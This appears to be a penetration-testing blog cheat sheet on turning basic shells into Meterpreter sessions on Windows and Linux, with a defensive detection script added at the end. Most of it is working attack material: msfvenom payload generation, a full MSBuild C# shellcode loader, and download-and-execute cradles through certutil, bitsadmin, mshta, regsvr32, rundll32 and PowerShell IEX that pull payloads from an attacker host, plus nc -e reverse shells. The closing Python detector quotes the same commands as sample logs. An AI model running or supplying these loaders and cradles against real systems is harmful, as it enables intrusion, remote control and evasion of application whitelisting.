Shell Upgrade Cheat Sheet


Cheat sheet for upgrading regular shells to meterpreter sessions, covering both Windows and Linux target hosts. handler.sh is mentioned throughout this post; it can be found on my GitHub.

Windows

MSBuild.exe


The Microsoft Build Engine is a platform for building applications. Visual Studio uses MSBuild, but it doesn’t depend on Visual Studio. By invoking msbuild.exe on your project or solution file, you can orchestrate and build products in environments where Visual Studio isn’t installed. The project files in Visual Studio (.csproj, .vbproj, .vcxproj, and others) contain MSBuild XML code that executes when you build a project.

Generate csharp meterpreter reverse shell code:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f csharp -e x86/shikata_ga_nai -i <# of iterations> 

I’ve added /* */ comment markers around the spot where we place our generated csharp meterpreter reverse shell code; be sure to replace the new byte[] value with the msfvenom one:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee --> 
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
    
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class ClassExample :  Task, ITask
        {         
          private static UInt32 MEM_COMMIT = 0x1000;          
          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
          [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
          [DllImport("kernel32")]
            private static extern IntPtr CreateThread(            
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId           
            );
          [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(           
            IntPtr hHandle,
            UInt32 dwMilliseconds
            );          
          public override bool Execute()
          {
              byte[] shellcode = new byte[195] {
            /*0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
              0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
              0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
              0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
              0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
              0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
              0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
              0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
              0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
              0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
              0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
              0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
              0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };*/
              
              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
              IntPtr hThread = IntPtr.Zero;
              UInt32 threadId = 0;
              IntPtr pinfo = IntPtr.Zero;
              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
              WaitForSingleObject(hThread, 0xFFFFFFFF);
              return true;
          } 
        }     
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

Serve the file, download, and execute to get a meterpreter session:

# ./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>                   // start msfconsole handler

# python -m SimpleHTTPServer 80                                                  // serve upgrade.csproj

> Invoke-WebRequest "http://<lhost>/upgrade.csproj" -OutFile "upgrade.csproj"    // download upgrade.csproj on the Windows host

> C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe upgrade.csproj       // execute

This is the manual approach; the next section demonstrates a tool that takes care of it for us.


nps_payload


nps_payload generates payloads for basic intrusion detection avoidance; however, we can also use it to upgrade our shell to a meterpreter session.

nps_payload has two available payloads. The first one is similar to the MSBuild.exe approach in the previous section: it generates an XML file that, once uploaded to and executed on the Windows host, sends you a meterpreter shell.

# python nps_payload.py 

...

	(1)	Generate msbuild/nps/msf payload
	(2)	Generate msbuild/nps/msf HTA payload
	(99)	Quit

Select a task: 1

Payload Selection:

	(1)	windows/meterpreter/reverse_tcp
	(2)	windows/meterpreter/reverse_http
	(3)	windows/meterpreter/reverse_https
	(4)	Custom PS1 Payload

Select payload: 1
Enter Your Local IP Address (None): <lhost>
Enter the listener port (443): 443
[*] Generating PSH Payload...
[*] Generating MSF Resource Script...
[+] Metasploit resource script written to msbuild_nps.rc
[+] Payload written to msbuild_nps.xml

1. Run "msfconsole -r msbuild_nps.rc" to start listener.
2. Choose a Deployment Option (a or b): - See README.md for more information.
  a. Local File Deployment:
    - %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml
  b. Remote File Deployment:
    - wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
3. Hack the Planet!!

Now do the following and you’ll receive a meterpreter shell:

# msfconsole -r msbuild_nps.rc     // start msfconsole handler
# python -m SimpleHTTPServer 80    // serve msbuild_nps.xml

> Invoke-WebRequest "http://<attackingIP>/msbuild_nps.xml" -OutFile "C:\programdata\msbuild_nps.xml"  // download to Windows host 
> C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\programdata\msbuild_nps.xml            // execute 



unicorn


Unicorn uses a PowerShell downgrade attack to inject shellcode straight into memory.

# python unicorn.py windows/meterpreter/reverse_tcp <lhost> <port>
→ This outputs two files when it's done:
1. unicorn.rc 
2. powershell_attack.txt  

# msfconsole -r unicorn.rc               // start msfconsole handler

→ Then copy/paste contents of powershell_attack.txt into Windows shell 
→ If the target host is vulnerable, we should receive a meterpreter session

Another way to achieve this is shown below:

# msfconsole -r unicorn.rc                 // start msfconsole handler

# cat powershell_attack.txt |xclip         // copy contents to clipboard

# vim exploit.html                         // paste powershell_attack.txt content inside

→ Delete everything outside the first " and last "

# python -m SimpleHTTPServer 80            // serve exploit.html

> powershell "IEX (New-Object Net.WebClient).downloadString('http://<lhost>/exploit.html')"  // execute on host

→ Should receive meterpreter session once exploit.html is downloaded and executed 

For more information on the PowerShell downgrade attack, click here.



GreatSCT


GreatSCT is an application whitelist bypass tool; however, we can also use it to upgrade our shell to a meterpreter session.

# ./GreatSCT.py --ip <lhost> --port <lport> -t Bypass -p mshta/shellcode_inject/base64_migrate.py --msfvenom windows/meterpreter/reverse_tcp -o upgrade 
...
[*] Language: mshta
[*] Payload Module: mshta/shellcode_inject/base64_migrate
[*] Executable written to: /usr/share/greatsct-output/compiled/upgrade.hta
[*] Execute with: mshta.exe upgrade.hta
[*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/upgrade.rc

# cd /usr/share/greatsct-output/source
# python -m SimpleHTTPServer 80         // serve upgrade.hta

# msfconsole -r /usr/share/greatsct-output/handlers/upgrade.rc   // start msfconsole handler

> mshta.exe //<lhost>/upgrade.hta      // execute on host 

The process shown above is almost identical for the payloads listed below:

[*] Available Payloads:

	1)	installutil/meterpreter/rev_http.py
	2)	installutil/meterpreter/rev_https.py
	3)	installutil/meterpreter/rev_tcp.py
	4)	installutil/powershell/script.py
	5)	installutil/shellcode_inject/base64.py
	6)	installutil/shellcode_inject/virtual.py

	7)	msbuild/meterpreter/rev_http.py
	8)	msbuild/meterpreter/rev_https.py
	9)	msbuild/meterpreter/rev_tcp.py
	10)	msbuild/powershell/script.py
	11)	msbuild/shellcode_inject/base64.py
	12)	msbuild/shellcode_inject/virtual.py

	13)	mshta/shellcode_inject/base64_migrate.py

	14)	regasm/meterpreter/rev_http.py
	15)	regasm/meterpreter/rev_https.py
	16)	regasm/meterpreter/rev_tcp.py
	17)	regasm/powershell/script.py
	18)	regasm/shellcode_inject/base64.py
	19)	regasm/shellcode_inject/virtual.py

	20)	regsvcs/meterpreter/rev_http.py
	21)	regsvcs/meterpreter/rev_https.py
	22)	regsvcs/meterpreter/rev_tcp.py
	23)	regsvcs/powershell/script.py
	24)	regsvcs/shellcode_inject/base64.py
	25)	regsvcs/shellcode_inject/virtual.py

	26)	regsvr32/shellcode_inject/base64_migrate.py

If you run ./GreatSCT.py on its own, it’ll give you a greater understanding of each payload’s setup and what it has to offer.



mshta.exe


The Mshta.exe component provides the Microsoft HTML Application Host, which allows execution of .HTA (HTML Application) files.

msf5 > use exploit/windows/misc/hta_server

> set srvhost <lhost>
> set lhost <lhost>
> set lport <lport>

> set payload windows/meterpreter/reverse_tcp

> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on <lhost>:<lport> 
[*] Using URL: http://<lhost>:8080/1KxF2EDVH.hta
[*] Server started.

mshta.exe http://<lhost>:8080/1KxF2EDVH.hta   // execute on host



rundll32.exe


Rundll32 loads and runs 32-bit dynamic-link libraries (DLLs).

msf5 > use exploit/windows/smb/smb_delivery

> set srvhost <lhost>
> set lhost <lhost>
> set lport <lport>

> set payload windows/meterpreter/reverse_tcp

> run 
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on <lhost>:<port> 
[*] Started service listener on <lhost>:445 
[*] Server started.
[*] Run the following command on the target machine:   

rundll32.exe \\<lhost>\rwga\test.dll,0 



regsvr32.exe


Regsvr32 registers .dll files as command components in the registry.

msf5 > use exploit/multi/script/web_delivery

> set srvhost <lhost>
> set lhost <lhost>
> set lport <lport>

> set target 3 
> set payload windows/meterpreter/reverse_tcp

> run 
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on <lhost>:<lport>
[*] Using URL: http://<lhost>:8080/CPqHf5QVRYt0M0
[*] Server started.
[*] Run the following command on the target machine:

regsvr32 /s /n /u /i:http://<lhost>:8080/CPqHf5QVRYt0M0.sct scrobj.dll



certutil.exe


Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.

# msfvenom -p windows/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f exe > upgrade.exe

# python -m SimpleHTTPServer 80 

# ./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>

> certutil.exe -urlcache -split -f http://<lhost>/upgrade.exe C:\programdata\upgrade.exe & C:\programdata\upgrade.exe 



bitsadmin.exe


bitsadmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.

# msfvenom -p windows/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f exe > upgrade.exe

# python -m SimpleHTTPServer 80

# ./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>

> bitsadmin /transfer upgrade /download /priority normal http://<lhost>/upgrade.exe C:\programdata\upgrade.exe & C:\programdata\upgrade.exe



msiexec.exe


Msiexec provides the means to install, modify, and perform operations on Windows Installer packages from the command line.

# msfvenom -p windows/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f msi > upgrade.msi

# python -m SimpleHTTPServer 80

# ./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>

> msiexec /q /i http://<lhost>/upgrade.msi



Linux

After we’ve got a reverse shell via a netcat listener, we can upgrade that shell to a meterpreter session by leveraging the Metasploit module post/multi/manage/shell_to_meterpreter. First we set up our msfconsole handler:

./handler.sh linux/x86/shell/reverse_tcp <lhost> <lport>  

Then execute nc <lhost> <lport> -e /bin/sh in the netcat shell.

# nc -nlvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from <victimIP>.
Ncat: Connection from <victimIP>:49337.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'

www-data@pwnd:/var/www/$ nc <lhost> <lport> -e /bin/sh 

Once we receive the new shell on our handler, press Ctrl+Z to background it. Then run the following commands to upgrade the session to a meterpreter one:

> use post/multi/manage/shell_to_meterpreter
> set session <session id>
> run

[*] Upgrading session ID: <session id>
...
[*] Post module execution completed
[*] Meterpreter session 1 opened ...

> sessions -i <session id>

meterpreter >
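From the defender's side, every technique in this cheat sheet leaves a recognisable process command line: MSBuild run on an .xml "project" or a project file dropped in a staging directory, mshta/rundll32/regsvr32 loading from a URL or SMB share, certutil/bitsadmin/msiexec pulling a file over HTTP, the unicorn-style IEX download cradle, and on the Linux side the nc -e /bin/sh callback and the pty stabiliser. The following is an added example (not code from this post or from any of the tools it mentions) that applies one rule per technique to constructed process-creation log lines. The log format "<host>|<image path>|<command line>", the STAGING_DIRS heuristic, the rule names and the sample events are all my own assumptions, and 192.0.2.10 is a documentation-range placeholder standing in for the listener host.

```python
"""Added detection example (not the post's own code): flag the shell-upgrade
command lines this cheat sheet shows when they appear in process-creation logs.
Log format "<host>|<image path>|<command line>" and every sample line below are
constructed; 192.0.2.10 is a documentation-range placeholder for the listener."""
import re
from dataclasses import dataclass

# Staging directories the post's examples write to (C:\programdata); assumed
# heuristic that keeps the MSBuild and download-to-disk rules quieter than
# "any project build" or "any download".
STAGING_DIRS = r"(programdata|\\temp\\|\\public\\|\\downloads\\|appdata)"


@dataclass(frozen=True)
class Rule:
    name: str
    images: tuple    # accepted process image basenames, lowercase
    pattern: str     # regex applied to the lowercased command line


RULES = (
    # msbuild run on an .xml "project" (nps_payload output) or a project file
    # sitting in a staging directory, rather than a normal .sln/.csproj build
    Rule("msbuild-inline-task", ("msbuild.exe",),
         r"\.xml\b|" + STAGING_DIRS + r"\S*\.\w*proj\b"),
    # mshta fetching an HTA over HTTP or a UNC/WebDAV path
    Rule("mshta-remote-hta", ("mshta.exe",), r"\s(https?://|//|\\\\)\S+"),
    # rundll32 loading a DLL straight from an SMB share
    Rule("rundll32-unc-dll", ("rundll32.exe",), r"\s\\\\[^\s,]+\.dll"),
    # regsvr32 scriptlet load from a URL
    Rule("regsvr32-remote-sct", ("regsvr32.exe",), r"/i:https?://.*\bscrobj\.dll"),
    Rule("certutil-urlcache-download", ("certutil.exe",),
         r"-urlcache\b.*\s-f\s+https?://"),
    Rule("bitsadmin-transfer-download", ("bitsadmin.exe",),
         r"/transfer\b.*\bhttps?://"),
    Rule("msiexec-remote-package", ("msiexec.exe",), r"/i\s+https?://"),
    # in-memory download cradle (unicorn section) and download to a staging dir
    Rule("powershell-download-cradle", ("powershell.exe", "pwsh.exe"),
         r"\b(iex|invoke-expression)\b.*(downloadstring|net\.webclient)"),
    Rule("powershell-download-to-staging", ("powershell.exe", "pwsh.exe"),
         r"\b(invoke-webrequest|iwr)\b.*-outfile\b.*" + STAGING_DIRS),
    # Linux section: netcat callback with -e and the python pty stabiliser
    Rule("nc-exec-shell", ("nc", "ncat", "netcat"), r"-e\s+/bin/(ba)?sh\b"),
    Rule("python-pty-spawn", ("python", "python2", "python3"), r"pty\.spawn\("),
)

# Constructed sample events: one hit per technique plus a few benign look-alikes
# (a real solution build, a local rundll32, certutil -verify, a local MSI).
SAMPLE_LOG = r"""
ws01|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|msbuild.exe C:\programdata\msbuild_nps.xml
dev01|C:\Program Files (x86)\MSBuild\Current\Bin\MSBuild.exe|msbuild.exe C:\src\app\app.sln /t:Build
ws01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell "IEX (New-Object Net.WebClient).downloadString('http://192.0.2.10/exploit.html')"
ws01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "Invoke-WebRequest http://192.0.2.10/msbuild_nps.xml -OutFile C:\programdata\msbuild_nps.xml"
ws02|C:\Windows\System32\mshta.exe|mshta.exe http://192.0.2.10:8080/1KxF2EDVH.hta
ws02|C:\Windows\System32\rundll32.exe|rundll32.exe \\192.0.2.10\rwga\test.dll,0
ws02|C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
ws03|C:\Windows\System32\regsvr32.exe|regsvr32 /s /n /u /i:http://192.0.2.10:8080/payload.sct scrobj.dll
ws03|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://192.0.2.10/upgrade.exe C:\programdata\upgrade.exe
ws03|C:\Windows\System32\certutil.exe|certutil.exe -verify C:\certs\server.cer
ws04|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer upgrade /download /priority normal http://192.0.2.10/upgrade.exe C:\programdata\upgrade.exe
ws04|C:\Windows\System32\msiexec.exe|msiexec /q /i http://192.0.2.10/upgrade.msi
ws04|C:\Windows\System32\msiexec.exe|msiexec /i C:\installers\vendor.msi /qn
web01|/bin/nc|nc 192.0.2.10 443 -e /bin/sh
web01|/usr/bin/python|python -c 'import pty; pty.spawn("/bin/bash")'
"""


def parse(line):
    """Split one log line into (host, image basename lowercased, command line)."""
    host, image, cmdline = line.split("|", 2)
    basename = re.split(r"[\\/]", image.strip())[-1].lower()
    return host.strip(), basename, cmdline.strip()


def match_rules(image_basename, cmdline):
    """Return the names of every rule whose image and pattern fit this event."""
    lowered = cmdline.lower()
    return [r.name for r in RULES
            if image_basename in r.images and re.search(r.pattern, lowered)]


def scan(lines):
    """Yield (host, rule name, command line) for each rule hit; blanks are skipped."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        host, image, cmdline = parse(line)
        for name in match_rules(image, cmdline):
            hits.append((host, name, cmdline))
    return hits


if __name__ == "__main__":
    for host, name, cmdline in scan(SAMPLE_LOG.splitlines()):
        print(f"{host:6} {name:32} {cmdline}")
```

Two caveats on this approach. The rules only see what reaches a process command line: the Invoke-WebRequest and mshta lines in the post are typed into an existing interactive shell, so on a real host they surface through PowerShell script block logging or command-line auditing of the child process, not through the parent's creation event. The msbuild rule is deliberately narrow (an .xml project or a staging-directory path) because flagging every msbuild.exe invocation is unworkable on developer machines; a bare relative project file run from an odd working directory is not caught here and would need the parent process and working directory as extra fields.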